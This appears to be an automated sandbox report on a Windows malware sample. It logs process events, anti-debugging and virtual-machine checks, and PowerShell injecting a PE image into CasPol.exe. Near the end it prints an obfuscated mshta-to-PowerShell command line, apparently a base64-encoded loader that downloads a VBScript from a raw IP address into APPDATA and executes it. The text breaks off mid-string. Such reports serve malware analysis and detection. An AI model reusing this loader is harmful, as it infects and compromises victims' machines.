Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0040E54F Sleep,ExitProcess,

12_2_0040E54F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

12_2_004198D2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6855	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2765	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3911	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5872	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 4304	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 5645	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

API coverage: 8.8 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5132	Thread sleep count: 6855 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3728	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 776	Thread sleep count: 2765 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3544	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4888	Thread sleep count: 4304 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4888	Thread sleep time: -12912000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4888	Thread sleep count: 5645 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4888	Thread sleep time: -16935000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	12_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	12_2_0041B43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	12_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0044D5F9 FindFirstFileExA,	12_2_0044D5F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	12_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,	12_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	12_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW,	12_2_00418C79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	12_2_00408DA7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

12_2_00406F06

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: CasPol.exe, 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: wscript.exe, 00000007.00000003.2236902758.0000000005765000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: powershell.exe, 00000003.00000002.2252958107.0000000008473000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2252958107.000000000842A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000008.00000002.2517116385.0000000006E7F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

API call chain: ExitProcess graph end node

graph_12-47423

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_0043A66D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

12_2_0041BCF3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00442564 mov eax, dword ptr fs:[00000030h]

12_2_00442564

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0044E93E GetProcessHeap,

12_2_0044E93E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00434178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0043A66D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00433B54
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00433CE7 SetUnhandledExceptionFilter,	12_2_00433CE7

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell decode and execute

Source: Yara match

File source: amsi32_6556.amsi.csv, type: OTHER

Yara detected Powershell download and execute

Source: Yara match	File source: amsi32_6556.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: D1A008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

12_2_00410F36

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00418764 mouse_event,

12_2_00418764

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAg